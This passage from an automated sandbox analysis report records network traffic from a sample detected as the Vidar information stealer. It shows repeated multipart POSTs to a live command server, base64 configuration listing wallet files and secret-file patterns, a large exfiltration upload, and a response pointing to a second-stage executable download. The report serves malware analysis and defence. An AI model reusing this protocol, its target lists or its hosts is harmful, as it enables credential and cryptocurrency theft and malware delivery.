                                                                                                                          Data Ascii: ------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="token"616e377245a2b36ffedf2f7ef732c045------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------JDBFIIEBGCAKKEBFBAAFCont
                                                                                                                          2024-10-03 01:27:11 UTC158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:27:11 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          2024-10-03 01:27:11 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 2ok0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          18192.168.2.75796449.12.197.94437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:27:12 UTC276OUTPOST / HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=----JJEGCBGIDHCAKEBGIIDB
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Content-Length: 331
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:27:12 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 36 65 33 37 37 32 34 35 61 32 62 33 36 66 66 65 64 66 32 66 37 65 66 37 33 32 63 30 34 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 0d 0a 43 6f 6e 74
                                                                                                                          Data Ascii: ------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="token"616e377245a2b36ffedf2f7ef732c045------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------JJEGCBGIDHCAKEBGIIDBCont
                                                                                                                          2024-10-03 01:27:13 UTC158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:27:12 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          2024-10-03 01:27:13 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                          Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          19192.168.2.75796549.12.197.94437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:27:13 UTC276OUTPOST / HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCG
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Content-Length: 331
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:27:13 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 36 65 33 37 37 32 34 35 61 32 62 33 36 66 66 65 64 66 32 66 37 65 66 37 33 32 63 30 34 35 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74
                                                                                                                          Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="token"616e377245a2b36ffedf2f7ef732c045------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------HDGCFHIDAKECFHIEBFCGCont
                                                                                                                          2024-10-03 01:27:14 UTC158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:27:14 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          2024-10-03 01:27:14 UTC1524INData Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69
                                                                                                                          Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          20192.168.2.75796649.12.197.94437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:27:15 UTC276OUTPOST / HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECA
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Content-Length: 461
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:27:15 UTC461OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 36 65 33 37 37 32 34 35 61 32 62 33 36 66 66 65 64 66 32 66 37 65 66 37 33 32 63 30 34 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74
                                                                                                                          Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="token"616e377245a2b36ffedf2f7ef732c045------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------KEHDHIDAEHCFHJJJJECACont
                                                                                                                          2024-10-03 01:27:16 UTC158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:27:16 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          2024-10-03 01:27:16 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 2ok0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          21192.168.2.75796849.12.197.94437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:27:17 UTC278OUTPOST / HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKF
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Content-Length: 98177
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:27:17 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 36 65 33 37 37 32 34 35 61 32 62 33 36 66 66 65 64 66 32 66 37 65 66 37 33 32 63 30 34 35 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74
                                                                                                                          Data Ascii: ------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="token"616e377245a2b36ffedf2f7ef732c045------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------FBKFCFBFIDGCGDHJDBKFCont
                                                                                                                          2024-10-03 01:27:17 UTC16355OUTData Raw: 64 7a 30 4d 42 69 4b 32 45 71 75 63 59 58 62 56 75 76 72 2b 68 36 37 2f 77 6d 2f 68 33 2f 41 4b 43 42 2f 77 43 2f 45 6e 2f 78 4e 48 2f 43 62 2b 48 66 2b 67 67 66 2b 2f 45 6e 2f 77 41 54 58 6b 72 57 31 79 6c 36 74 6b 31 70 63 72 64 73 4d 72 62 6d 46 68 49 52 37 4c 6a 4a 36 48 74 55 69 36 64 71 44 54 76 41 75 6d 33 78 6d 6a 41 5a 34 78 61 79 62 6c 42 7a 67 6b 59 34 42 77 66 79 72 7a 66 37 4b 6f 66 38 2f 50 79 50 58 2f 74 76 46 66 38 41 50 72 38 7a 31 62 2f 68 4e 2f 44 76 2f 51 51 50 2f 66 69 54 2f 77 43 4a 72 68 50 47 6d 71 57 65 72 36 7a 46 63 57 4d 33 6d 78 4c 62 71 68 62 61 56 35 44 4d 65 68 41 39 52 58 4e 4c 49 47 43 6c 51 35 44 79 65 55 75 45 50 4c 38 66 4b 4f 50 76 63 6a 6a 72 7a 55 79 57 31 31 4a 44 4e 4d 6c 70 64 50 46 41 7a 4c 4b 36 77 4f 56 6a 4b
                                                                                                                          Data Ascii: dz0MBiK2EqucYXbVuvr+h67/wm/h3/AKCB/wC/En/xNH/Cb+Hf+ggf+/En/wATXkrW1yl6tk1pcrdsMrbmFhIR7LjJ6HtUi6dqDTvAum3xmjAZ4xayblBzgkY4Bwfyrzf7Kof8/PyPX/tvFf8APr8z1b/hN/Dv/QQP/fiT/wCJrhPGmqWer6zFcWM3mxLbqhbaV5DMehA9RXNLIGClQ5DyeUuEPL8fKOPvcjjrzUyW11JDNMlpdPFAzLK6wOVjK
                                                                                                                          2024-10-03 01:27:17 UTC16355OUTData Raw: 63 31 34 4b 6d 6d 37 48 31 4e 48 47 51 71 79 35 45 6d 5a 6d 72 65 46 47 31 47 78 6e 31 4b 77 55 6d 37 46 31 63 2b 5a 46 2f 7a 31 41 6d 63 63 66 37 51 48 35 31 77 2f 49 4a 42 42 42 48 42 42 37 56 37 53 32 6a 57 68 64 32 44 58 53 62 32 4c 6c 59 37 79 56 46 79 54 6b 6e 43 73 41 4d 6b 6b 31 35 7a 34 32 73 4c 62 54 39 65 56 4c 5a 58 55 53 51 4c 49 35 65 52 6e 4c 4d 57 59 45 6b 73 53 65 77 72 32 73 70 78 55 31 55 56 42 36 70 2f 67 65 52 6e 75 42 70 79 70 50 45 72 53 53 74 66 7a 31 73 63 35 52 52 52 58 30 68 38 65 4a 69 69 69 69 67 59 55 6c 4c 52 51 41 6c 46 4c 52 51 41 6c 46 46 46 41 43 59 6f 70 61 54 76 51 4d 4b 4b 4b 4b 41 43 6b 70 61 4b 42 69 55 55 74 4a 54 41 57 6a 46 46 46 49 42 4b 54 76 53 30 55 77 43 69 69 69 67 59 6c 46 46 46 41 41 61 53 6c 70 4b 42 68
                                                                                                                          Data Ascii: c14Kmm7H1NHGQqy5EmZmreFG1Gxn1KwUm7F1c+ZF/z1Amccf7QH51w/IJBBBHBB7V7S2jWhd2DXSb2LlY7yVFyTknCsAMkk15z42sLbT9eVLZXUSQLI5eRnLMWYEksSewr2spxU1UVB6p/geRnuBpypPErSStfz1sc5RRRX0h8eJiiiigYUlLRQAlFLRQAlFFFACYopaTvQMKKKKACkpaKBiUUtJTAWjFFFIBKTvS0UwCiiigYlFFFAAaSlpKBh
                                                                                                                          2024-10-03 01:27:17 UTC16355OUTData Raw: 66 31 71 37 63 66 38 41 48 68 64 66 37 71 2f 2b 68 43 71 57 6d 2f 36 35 2f 77 44 63 70 78 2b 46 6b 6d 6a 52 33 70 4b 58 76 53 4b 44 4e 47 65 4b 4b 4b 41 46 7a 51 4b 53 67 55 43 48 64 52 52 54 51 61 4b 41 48 55 55 6c 46 46 67 73 4c 6d 6a 4e 4a 52 53 43 77 37 50 76 52 6e 50 4e 4e 6f 7a 52 59 4c 44 36 4d 30 30 47 6a 4e 4b 77 72 44 77 61 58 4f 61 59 44 53 35 70 57 43 77 38 48 4e 58 74 4b 50 38 41 70 66 38 41 32 7a 66 2f 41 4e 42 4e 5a 77 50 2b 63 56 66 30 6f 2f 36 61 50 39 78 2f 2f 51 54 57 56 5a 66 75 32 54 62 55 34 64 2b 70 78 36 56 45 66 35 31 49 33 57 6f 7a 36 64 4b 39 71 48 77 6f 36 6f 6a 63 30 30 6e 38 71 55 30 30 6d 71 5a 61 45 37 55 30 38 30 70 70 44 7a 55 4e 6c 6f 62 6e 46 4a 33 2f 41 4d 61 58 72 53 47 6f 4b 51 30 30 6d 65 61 55 38 6a 46 49 61 6b 70
                                                                                                                          Data Ascii: f1q7cf8AHhdf7q/+hCqWm/65/wDcpx+FkmjR3pKXvSKDNGeKKKAFzQKSgUCHdRRTQaKAHUUlFFgsLmjNJRSCw7PvRnPNNozRYLD6M00GjNKwrDwaXOaYDS5pWCw8HNXtKP8Apf8A2zf/ANBNZwP+cVf0o/6aP9x//QTWVZfu2TbU4d+px6VEf51I3Woz6dK9qHwo6ojc00n8qU00mqZaE7U080ppDzUNlobnFJ3/AMaXrSGoKQ00meaU8jFIakp
                                                                                                                          2024-10-03 01:27:17 UTC16355OUTData Raw: 78 52 2b 4e 46 4a 51 4d 57 6a 4e 4a 52 51 4d 4d 30 6c 46 46 41 42 53 55 74 4e 7a 51 4d 57 6b 4e 4c 53 55 42 59 4b 4b 4b 53 67 59 47 69 67 30 6c 4d 41 6f 7a 53 55 55 58 47 46 49 54 53 30 6c 41 77 70 4b 57 6b 6f 41 51 30 55 47 69 67 59 6c 46 46 46 46 78 68 53 55 74 4a 54 41 53 6c 34 6f 4e 4a 54 47 46 49 61 57 69 67 59 6c 46 46 46 49 59 55 6c 4c 53 55 41 46 46 46 46 41 43 47 69 67 30 55 41 4a 52 53 30 6c 41 77 6f 6f 6f 6f 41 53 6b 70 63 55 59 6f 47 41 6f 70 4b 58 46 41 78 74 42 70 61 53 67 41 6f 6f 6f 35 6f 47 46 46 46 46 41 43 55 55 6c 46 41 78 54 53 55 45 30 5a 70 6f 45 4a 53 30 67 4f 4b 4b 41 43 6a 69 67 6d 6b 7a 54 4b 51 6f 5a 6b 50 79 73 56 2b 6a 56 4d 6c 35 63 6f 66 6c 6d 66 38 54 6d 71 35 4e 4a 6d 6a 6c 75 42 6f 4c 71 74 30 76 55 6f 33 31 57 70 56 31
                                                                                                                          Data Ascii: xR+NFJQMWjNJRQMM0lFFABSUtNzQMWkNLSUBYKKKSgYGig0lMAozSUUXGFITS0lAwpKWkoAQ0UGigYlFFFFxhSUtJTASl4oNJTGFIaWigYlFFFIYUlLSUAFFFFACGig0UAJRS0lAwooooASkpcUYoGAopKXFAxtBpaSgAooo5oGFFFFACUUlFAxTSUE0ZpoEJS0gOKKACjigmkzTKQoZkPysV+jVMl5coflmf8Tmq5NJmjluBoLqt0vUo31WpV1
                                                                                                                          2024-10-03 01:27:17 UTC16355OUTData Raw: 43 6e 7a 4a 4a 4a 74 32 76 70 2f 77 41 4d 66 70 73 36 6e 4c 64 74 70 4b 39 74 66 2b 48 43 38 31 37 52 4a 37 47 34 68 54 57 74 4e 33 53 52 4d 67 7a 64 4a 6a 4a 42 48 72 57 4e 71 71 48 58 64 49 6e 75 46 54 54 35 34 37 64 57 62 7a 72 65 38 38 7a 59 51 4d 6b 63 4c 36 59 34 2b 6c 64 69 57 41 49 42 49 79 65 67 7a 31 72 6e 35 50 38 41 6a 30 38 56 66 39 64 47 2f 77 44 53 57 4b 6c 47 33 78 51 75 6d 74 64 2f 50 30 43 53 62 39 79 64 6d 6e 70 74 35 65 70 35 64 52 52 6d 67 31 39 6d 66 6d 51 55 64 36 53 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 70 4b 41 46 70 4d 30 55 47 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 70 67 46 46 47 66 61 6b 7a 53 47 4c 2b 4e 4a 53 55 55 77 46 7a 53 45 30 55 55 68 69 55 55 55 55 41 46 46 46 49 61 41
                                                                                                                          Data Ascii: CnzJJJt2vp/wAMfps6nLdtpK9tf+HC817RJ7G4hTWtN3SRMgzdJjJBHrWNqqHXdInuFTT547dWbzre88zYQMkcL6Y4+ldiWAIBIyegz1rn5P8Aj08Vf9dG/wDSWKlG3xQumtd/P0CSb9ydmnpt5ep5dRRmg19mfmQUd6SigAooooAKKKKACiiigAoopKAFpM0UGgAooooAKKKKACiiigAooopgFFGfakzSGL+NJSUUwFzSE0UUhiUUUUAFFFIaA
                                                                                                                          2024-10-03 01:27:17 UTC47OUTData Raw: 2f 38 41 58 78 4e 2f 36 44 48 51 42 2f 2f 5a 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 2d 2d 0d 0a
                                                                                                                          Data Ascii: /8AXxN/6DHQB//Z------FBKFCFBFIDGCGDHJDBKF--
                                                                                                                          2024-10-03 01:27:19 UTC158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:27:18 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          2024-10-03 01:27:19 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 2ok0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          22192.168.2.75796949.12.197.94437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:27:20 UTC276OUTPOST / HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=----AAAAECGHCBGCBFHIIDHI
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Content-Length: 331
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:27:20 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 41 41 45 43 47 48 43 42 47 43 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 36 65 33 37 37 32 34 35 61 32 62 33 36 66 66 65 64 66 32 66 37 65 66 37 33 32 63 30 34 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 45 43 47 48 43 42 47 43 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 45 43 47 48 43 42 47 43 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74
                                                                                                                          Data Ascii: ------AAAAECGHCBGCBFHIIDHIContent-Disposition: form-data; name="token"616e377245a2b36ffedf2f7ef732c045------AAAAECGHCBGCBFHIIDHIContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------AAAAECGHCBGCBFHIIDHICont
                                                                                                                          2024-10-03 01:27:21 UTC158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:27:21 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          2024-10-03 01:27:21 UTC91INData Raw: 35 30 0d 0a 4d 54 49 32 4e 6a 6b 78 4d 48 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 73 5a 47 31 7a 4c 32 45 30 4d 7a 51 34 4e 6a 45 79 4f 44 4d 30 4e 79 35 6c 65 47 56 38 4d 58 78 72 61 32 74 72 66 41 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 50MTI2NjkxMHxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9sZG1zL2E0MzQ4NjEyODM0Ny5leGV8MXxra2trfA==0


                                                                                                                          Statistics

                                                                                                                          CPU Usage

                                                                                                                          Click to jump to process

                                                                                                                          Memory Usage

                                                                                                                          Click to jump to process

                                                                                                                          High Level Behavior Distribution

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Behavior

                                                                                                                          Click to jump to process

                                                                                                                          System Behavior

                                                                                                                          General

                                                                                                                          Target ID:0
                                                                                                                          Start time:21:26:15
                                                                                                                          Start date:02/10/2024
                                                                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                          Imagebase:0x380000
                                                                                                                          File size:405'544 bytes
                                                                                                                          MD5 hash:CC94BE13BC24599E326D03CA246A61FA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:1
                                                                                                                          Start time:21:26:15
                                                                                                                          Start date:02/10/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:3
                                                                                                                          Start time:21:26:16
                                                                                                                          Start date:02/10/2024
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                                                          Imagebase:0xf40000
                                                                                                                          File size:43'016 bytes
                                                                                                                          MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
